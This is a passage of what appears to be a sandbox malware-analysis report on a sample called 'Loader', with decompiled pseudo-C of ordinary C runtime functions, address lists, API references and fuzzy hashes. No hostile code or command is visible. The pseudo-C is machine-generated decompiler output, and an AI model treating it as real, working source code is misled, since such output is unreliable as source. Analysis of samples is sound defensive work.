												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0xb384c0 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00AF4A92(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00AF4AEF(_t149);
													goto L40;
												} else {
													_t76 = E00AF3B73(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00AED26C();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00AF4A92(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00AF0E59(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00AF4AEF(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00AF4A92(_t53, 1);
																		E00AF4AEF(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00AF3B73( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00AED26C();
																				asm("int3");
																				_t84 =  *0xb384c0; // 0x7cfa58
																				__eflags = _t84 -  *0xb384cc; // 0x7cfa58
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0xb384c0 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E00B02794(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E00AEF21B(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0xb384c0 = E00AF4A92(1, 4);
										E00AF4AEF(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0xb384c0 - _t110; // 0x7cfa58
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0xb384c4 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0xb384c4 = E00AF4A92(1, 4);
												E00AF4AEF(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0xb384c4 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00AF4AEF(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0xb384c4 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L00AF1B03();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00AEF21B(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x00afcbd2
0x00afcbd5
0x00afcbd7
0x00afcbdb
0x00afcbde
0x00afcbe0
0x00afcbf5
0x00afcbfa
0x00afcbfc
0x00afcc01
0x00afcc06
0x00afcc08
0x00afcde9
0x00afcdee
0x00000000
0x00afcc0e
0x00afcc0e
0x00afcc10
0x00000000
0x00afcc16
0x00afcc19
0x00afcc1c
0x00afcc21
0x00afcc23
0x00afcc29
0x00afcca6
0x00afcca6
0x00afccab
0x00afccae
0x00afccb0
0x00000000
0x00afccb6
0x00afccbd
0x00afccc2
0x00afccc7
0x00afccca
0x00afcccc
0x00afcd1d
0x00afcd1d
0x00afcd20
0x00000000
0x00afcd26
0x00afcd26
0x00afcd28
0x00afcd2b
0x00afcd2b
0x00afcd2e
0x00afcd30
0x00000000
0x00afcd36
0x00afcd36
0x00afcd3c
0x00000000
0x00afcd42
0x00afcd4c
0x00afcd4f
0x00afcd54
0x00afcd57
0x00afcd5a
0x00afcd5c
0x00000000
0x00afcd62
0x00afcd62
0x00afcd65
0x00afcd67
0x00afcd6a
0x00000000
0x00afcd6a
0x00afcd5c
0x00afcd3c
0x00afcd30
0x00afccce
0x00afccce
0x00afccd0
0x00000000
0x00afccd2
0x00afccd5
0x00afccdb
0x00afccde
0x00afcce1
0x00afcd16
0x00afcd18
0x00afcce3
0x00afcce3
0x00afccf0
0x00afccf0
0x00afccf3
0x00000000
0x00000000
0x00afccec
0x00afccef
0x00afccef
0x00afccef
0x00afccff
0x00afcd02
0x00afcd07
0x00afcd0a
0x00afcd0d
0x00afcd0f
0x00afcd6e
0x00afcd6e
0x00afcd6e
0x00afcd0f
0x00afcd73
0x00afcd76
0x00000000
0x00afcd78
0x00afcd78
0x00afcd7b
0x00afcd7b
0x00afcd7d
0x00afcd7e
0x00afcd7e
0x00afcd8a
0x00afcd92
0x00afcd95
0x00afcd96
0x00afcd98
0x00afcde0
0x00afcde1
0x00000000
0x00afcd9a
0x00afcda1
0x00afcda6
0x00afcda9
0x00afcdab
0x00afce05
0x00afce06
0x00afce07
0x00afce08
0x00afce09
0x00afce0a
0x00afce0f
0x00afce12
0x00afce16
0x00afce17
0x00afce1a
0x00afce1c
0x00afce23
0x00afce25
0x00afce27
0x00afce29
0x00afce2b
0x00afce2b
0x00afce2e
0x00afce2f
0x00afce2f
0x00afce2b
0x00afce35
0x00afce40
0x00afce43
0x00afce44
0x00afce46
0x00afceae
0x00afceae
0x00000000
0x00afce48
0x00afce48
0x00afce4a
0x00afce4c
0x00afce9e
0x00afcea0
0x00afcea6
0x00000000
0x00afce4e
0x00afce4e
0x00afce51
0x00afce51
0x00afce53
0x00afce53
0x00afce53
0x00afce56
0x00afce56
0x00afce58
0x00afce59
0x00afce59
0x00afce61
0x00afce65
0x00afce6f
0x00afce72
0x00afce77
0x00afce7a
0x00afce7e
0x00000000
0x00afce80
0x00afce88
0x00afce8d
0x00afce90
0x00afce92
0x00afceb3
0x00afceb5
0x00afceb6
0x00afceb7
0x00afceb8
0x00afceb9
0x00afceba
0x00afcebf
0x00afcec0
0x00afcec5
0x00afcecb
0x00afcecd
0x00afcece
0x00afced4
0x00000000
0x00afced4
0x00afced9
0x00000000
0x00000000
0x00000000
0x00afce92
0x00000000
0x00afce94
0x00afce94
0x00afce97
0x00afce99
0x00afce99
0x00000000
0x00afce9d
0x00afce4c
0x00afce1e
0x00afce1e
0x00afce1e
0x00afce20
0x00afce22
0x00afce22
0x00afcdad
0x00afcdbe
0x00afcdc2
0x00afcdce
0x00afcdd0
0x00afcdd2
0x00afcdd7
0x00afcdd7
0x00afcdda
0x00afcdda
0x00000000
0x00afcdd0
0x00afcdab
0x00afcd98
0x00afcd76
0x00afccd0
0x00afcccc
0x00afcc2b
0x00afcc2b
0x00afcc2e
0x00afcc4c
0x00afcc4c
0x00afcc4f
0x00afcc62
0x00afcc67
0x00afcc6c
0x00afcc6f
0x00afcc75
0x00afcdf4
0x00afcdf4
0x00afcdf4
0x00000000
0x00afcc7b
0x00afcc7b
0x00afcc81
0x00000000
0x00afcc83
0x00afcc8d
0x00afcc92
0x00afcc97
0x00afcc9a
0x00afcca0
0x00000000
0x00000000
0x00000000
0x00000000
0x00afcca0
0x00afcc81
0x00afcc51
0x00afcc51
0x00afcdf7
0x00afcdf8
0x00afcdff
0x00000000
0x00afce01
0x00afcc30
0x00afcc30
0x00afcc36
0x00000000
0x00afcc38
0x00afcc3d
0x00afcc3f
0x00000000
0x00afcc45
0x00afcc45
0x00000000
0x00afcc45
0x00afcc3f
0x00afcc36
0x00afcc2e
0x00afcc29
0x00afcc10
0x00afcbe2
0x00afcbe2
0x00afcbe7
0x00afcbed
0x00afce02
0x00afce04
0x00afce04
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00AFCBFC
_free.LIBCMT ref: 00AFCCD5
_free.LIBCMT ref: 00AFCD02

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: d14ec246cd84c1efeb9e53923ee09c0994ff81bda5dcd3f1691408e130de9800
Instruction ID: 8cc0b590582f4264ad5b6ebcbb95d7e054dbafa50eb2e231dd6810eafdfed7ac
Opcode Fuzzy Hash: d14ec246cd84c1efeb9e53923ee09c0994ff81bda5dcd3f1691408e130de9800
Instruction Fuzzy Hash: 5451D47194430DAFDB20AFFADA41ABEBBB8EF05364B10416AF714A7281EB318901C755

Uniqueness

Uniqueness Score: -1.00%

Function 00AE8D13 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00AE8D5C
__alloca_probe_16.LIBCMT ref: 00AE8D88
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00AE8DC7
LCMapStringEx.KERNEL32 ref: 00AE8DE4
LCMapStringEx.KERNEL32 ref: 00AE8E23
__alloca_probe_16.LIBCMT ref: 00AE8E40
LCMapStringEx.KERNEL32 ref: 00AE8E82
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AE8EA5

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 61c795f5f3df57cf30fd8c48d8e69d588215d55add77aa89a97cdb1ace8de311
Instruction ID: 795201ba0313fb5f5adedea3530e39f00b0befbe2998452078424ddcd9de411f
Opcode Fuzzy Hash: 61c795f5f3df57cf30fd8c48d8e69d588215d55add77aa89a97cdb1ace8de311
Instruction Fuzzy Hash: F551AF72A00296AFEF219F66CC45FAF7BA9EF44740F154425F9089A1A0DB39CD10CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF6850 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AF6850(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xb38738 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xb09df0 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00AF44C8(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00AF44C8(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00af6859
0x00af6903
0x00af6861
0x00af6863
0x00af686a
0x00af686c
0x00af6872
0x00af687f
0x00af6894
0x00af6898
0x00af68ea
0x00af68ea
0x00af68ef
0x00af68f3
0x00af68f6
0x00af68f6
0x00af68fc
0x00af68fe
0x00af6913
0x00af690e
0x00af6912
0x00af6912
0x00af6900
0x00af6900
0x00000000
0x00af6900
0x00af689a
0x00af68a3
0x00af68da
0x00af68da
0x00af68dc
0x00af68de
0x00000000
0x00000000
0x00af68e6
0x00000000
0x00af68e6
0x00af68ad
0x00af68b2
0x00af68b7
0x00000000
0x00000000
0x00af68c1
0x00af68c6
0x00af68cb
0x00000000
0x00000000
0x00af68d0
0x00af68d6
0x00000000
0x00af68d6
0x00af6877
0x00000000
0x00000000
0x00000000
0x00af687d
0x00af690c
0x00000000

Strings

ext-ms-, xrefs: 00AF68BB
api-ms-, xrefs: 00AF68A7

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 4276146445bb0f4bba32862dbc98d20a1b8b80de02443f7fb02567a80b258d73
Instruction ID: b1b8231fb587bc6e962ae6b13093eb8c98a306657e390694313b41b0abd69536
Opcode Fuzzy Hash: 4276146445bb0f4bba32862dbc98d20a1b8b80de02443f7fb02567a80b258d73
Instruction Fuzzy Hash: 5021D531A05228ABCB3187E4DC80A3F77A8AF147A0F250168FB46A7291DB70DD0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AFDBEF Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AFDBEF(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00AFD93B(_t45, 7);
					E00AFD93B(_t45 + 0x1c, 7);
					E00AFD93B(_t45 + 0x38, 0xc);
					E00AFD93B(_t45 + 0x68, 0xc);
					E00AFD93B(_t45 + 0x98, 2);
					E00AF4AEF( *((intOrPtr*)(_t45 + 0xa0)));
					E00AF4AEF( *((intOrPtr*)(_t45 + 0xa4)));
					E00AF4AEF( *((intOrPtr*)(_t45 + 0xa8)));
					E00AFD93B(_t45 + 0xb4, 7);
					E00AFD93B(_t45 + 0xd0, 7);
					E00AFD93B(_t45 + 0xec, 0xc);
					E00AFD93B(_t45 + 0x11c, 0xc);
					E00AFD93B(_t45 + 0x14c, 2);
					E00AF4AEF( *((intOrPtr*)(_t45 + 0x154)));
					E00AF4AEF( *((intOrPtr*)(_t45 + 0x158)));
					E00AF4AEF( *((intOrPtr*)(_t45 + 0x15c)));
					return E00AF4AEF( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00afdbf5
0x00afdbfa
0x00afdc03
0x00afdc0e
0x00afdc19
0x00afdc24
0x00afdc32
0x00afdc3d
0x00afdc48
0x00afdc53
0x00afdc61
0x00afdc6f
0x00afdc80
0x00afdc8e
0x00afdc9c
0x00afdca7
0x00afdcb2
0x00afdcbd
0x00000000
0x00afdccd
0x00afdcd2

APIs

Part of subcall function 00AFD93B: _free.LIBCMT ref: 00AFD960

_free.LIBCMT ref: 00AFDC3D

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

_free.LIBCMT ref: 00AFDC48
_free.LIBCMT ref: 00AFDC53
_free.LIBCMT ref: 00AFDCA7
_free.LIBCMT ref: 00AFDCB2
_free.LIBCMT ref: 00AFDCBD
_free.LIBCMT ref: 00AFDCC8

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 57b5788395b44956b5ecc076e52481a5917aef9744ba59720267e58942b41a53
Instruction ID: f2f7c3db1987c014ae7ac6626dfcc1d84c04fe91514ea93b6e3ea243b936b034
Opcode Fuzzy Hash: 57b5788395b44956b5ecc076e52481a5917aef9744ba59720267e58942b41a53
Instruction Fuzzy Hash: 29116371540B0CBAD621F7F2CE47FEBB79D9F09704F800815B3E966592EAB5B9048750

Uniqueness

Uniqueness Score: -1.00%

Function 00AF7F0E Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00AF7F0E(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0xb38530 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E00AED88E( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0xb38530 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0xb36e30; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0xb38530 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E00AFFB84( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0xb36e30)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0xb38530 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00AEA360( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0xb38530 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E00AFFB84( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00AFB701(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00AEEB2F(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t202 =  &(_t269[1]);
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0xb38530 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0xb38530 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0xb38530 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E00AF5649( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E00AF5649();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00AE95ED(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x00af7f19
0x00af7f20
0x00af7f23
0x00af7f2b
0x00af7f2e
0x00af7f3b
0x00af7f3e
0x00af7f41
0x00af7f48
0x00af7f50
0x00af7f53
0x00af7f56
0x00af7f5c
